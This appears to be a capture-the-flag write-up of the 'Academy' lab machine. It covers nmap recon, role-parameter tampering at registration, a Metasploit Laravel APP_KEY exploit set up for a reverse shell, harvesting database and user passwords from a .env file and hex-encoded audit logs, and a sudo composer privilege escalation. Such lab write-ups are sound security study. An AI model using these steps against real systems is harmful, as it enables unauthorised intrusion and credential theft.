Nmap

Making a script scan on all ports                                                              
                                                                                               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 11:27 +08                                
Nmap scan report for 10.129.20.117
Host is up (0.27s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=11/8%Time=5FA765A9%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.87 seconds

As Usual, add the hostname to /etc/hosts

Visit the academy.htb site, only a background nothing clickable.

Right click look at the souce, found the login and register site.

Trying to attemp with default admin creds. No errors been show, guess it is either not responsive or the error message is hidden.

Always use burp when you’re unsure about something in web, didnt see anything special.

Move to register.php, we found something juicy here. There’s a roleid parameter

Register 2 account with different roleid

However both account seems similar, it didnt login into the username I register, instead login as egre55

Tried gobuster, and we found a admin.php

With the roleid=1 account, manage to find a new subdomain dev-staging-01.academy.htb add it into /etc/hosts

Manage to interprate the site is running on PHP laravel framework

Perform searchsploit

we found a potential metasploitable CVE, it needs APP_KEY

set VHOST dev-staging-01.academy.htb
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts academy.htb
set lhost 10.10.14.2

And we got the www-data

After searching around, found one password in /var/www/html/academy/.env

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

...
...
...

By looking at the /home directory, we have total of 6 user

www-data@academy:/home$ ls
ls
21y4d  ch4p  cry0l1t3  egre55  g0blin  mrb3n

With trial and error, we manage to su as cry0l1t3 or you can just SSH in to get a proper shell

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

Found cry0l1ts is in adm group. With a bit of google

adm: Group adm is used for system monitoring tasks. Members of this group can read many log files in /var/log, and can use xconsole. Historically, /var/log was /usr/adm (and later /var/adm), thus the name of the group. admin: The admin group is used to grant sudo access on ubuntu 11.10 and earlier

Tons of log event are recorded, with help of some kind soul.

manage to find the right one

type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

Decode the hex character and we got mrb3n_Ac@d3my!

Again trial and error we are able login to mrb3n

perform sudo -l

$ sudo -l 
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Search gtfobin

and we got a easy root.